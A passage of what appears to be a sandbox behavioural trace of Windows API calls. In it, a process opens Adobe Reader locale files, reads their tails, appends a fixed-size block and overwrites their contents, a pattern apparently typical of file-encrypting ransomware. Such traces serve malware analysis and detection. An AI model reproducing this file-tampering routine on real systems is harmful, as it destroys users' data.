lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0072.110] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.110] ReleaseMutex (hMutex=0x168) returned 1 [0072.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.ITA", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0072.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.ITA", cchWideChar=15, lpMultiByteStr=0x1f7340c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.ITA", lpUsedDefaultChar=0x0) returned 15 [0072.111] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.626] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1c00 [0072.626] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.627] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1c00 [0072.627] WriteFile (in: hFile=0x1dc, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.628] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0072.628] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.628] CloseHandle (hObject=0x1dc) returned 1 [0072.628] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\updater.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\updater.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0073.679] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0073.680] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2a00 [0073.680] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0073.680] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.680] ReleaseMutex (hMutex=0x168) returned 1 [0073.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.ITA", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0073.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.ITA", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.ITA", lpUsedDefaultChar=0x0) returned 11 [0073.680] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.684] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1a00 [0073.684] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.685] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1a00 [0073.686] WriteFile (in: hFile=0x1e8, lpBuffer=0x2696c48*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c48*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.686] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0073.686] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0073.686] CloseHandle (hObject=0x1e8) returned 1 [0073.686] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\DigSig.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\digsig.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0073.688] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0073.688] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x14e00 [0073.689] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0073.689] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.689] ReleaseMutex (hMutex=0x168) returned 1 [0073.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.JPN", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0073.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.JPN", cchWideChar=10, lpMultiByteStr=0x1f7344c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.JPN", lpUsedDefaultChar=0x0) returned 10 [0073.689] ReadFile (in: hFile=0x1e8, lpBuffer=0x2692be8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2692be8*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0073.691] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x13e00 [0073.691] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.704] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x13e00 [0073.705] WriteFile (in: hFile=0x1e8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.706] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0073.706] WriteFile (in: hFile=0x1e8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0073.706] CloseHandle (hObject=0x1e8) returned 1 [0073.706] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\PPKLite.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\ppklite.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0073.707] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0073.708] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x5a000 [0073.708] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0073.709] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.709] ReleaseMutex (hMutex=0x168) returned 1 [0073.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLite.JPN", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0073.709] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLite.JPN", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLite.JPN", lpUsedDefaultChar=0x0) returned 11 [0073.709] ReadFile (in: hFile=0x1e8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0073.721] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x59000 [0073.721] ReadFile (in: hFile=0x1e8, lpBuffer=0x25ac078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25ac078*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.729] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x59000 [0073.729] WriteFile (in: hFile=0x1e8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.730] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0073.730] WriteFile (in: hFile=0x1e8, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0073.730] CloseHandle (hObject=0x1e8) returned 1 [0073.731] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0073.731] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0073.731] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe4 [0073.732] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0073.732] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.732] ReleaseMutex (hMutex=0x168) returned 1 [0073.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0073.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0073.732] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ee5e18, nNumberOfBytesToRead=0xe4, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee5e18*, lpNumberOfBytesRead=0x345f2bc*=0xe4, lpOverlapped=0x0) returned 1 [0073.734] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0073.734] WriteFile (in: hFile=0x1e8, lpBuffer=0x2665888*, nNumberOfBytesToWrite=0x66c, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2665888*, lpNumberOfBytesWritten=0x345f2d0*=0x66c, lpOverlapped=0x0) returned 1 [0073.735] CloseHandle (hObject=0x1e8) returned 1 [0073.735] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\BRdlang32.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\brdlang32.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0073.744] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0073.744] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2400 [0073.744] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0073.744] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.744] ReleaseMutex (hMutex=0x168) returned 1 [0073.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.KOR", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0073.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.KOR", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.KOR", lpUsedDefaultChar=0x0) returned 13 [0073.745] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.755] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1400 [0073.757] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0073.757] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1400 [0073.758] WriteFile (in: hFile=0x1e8, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0073.758] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0073.758] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0073.758] CloseHandle (hObject=0x1e8) returned 1 [0073.768] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Multimedia.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\multimedia.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0073.769] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0073.769] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xf000 [0073.769] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0073.769] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0073.769] ReleaseMutex (hMutex=0x168) returned 1 [0073.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.KOR", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0073.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.KOR", cchWideChar=14, lpMultiByteStr=0x1f733cc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.KOR", lpUsedDefaultChar=0x0) returned 14 [0073.769] ReadFile (in: hFile=0x1e8, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.076] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xe000 [0075.077] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.077] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xe000 [0075.078] WriteFile (in: hFile=0x1e8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.078] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0075.078] WriteFile (in: hFile=0x1e8, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.078] CloseHandle (hObject=0x1e8) returned 1 [0075.079] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\SendMail.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\sendmail.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0075.080] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.080] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3200 [0075.080] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.080] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.081] ReleaseMutex (hMutex=0x168) returned 1 [0075.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.KOR", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.KOR", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.KOR", lpUsedDefaultChar=0x0) returned 12 [0075.081] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.083] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2200 [0075.083] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.084] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2200 [0075.084] WriteFile (in: hFile=0x1e8, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.084] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0075.084] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0075.084] CloseHandle (hObject=0x1e8) returned 1 [0075.085] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\AdobeCollabSync.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\adobecollabsync.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0075.086] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.086] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1a00 [0075.086] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, 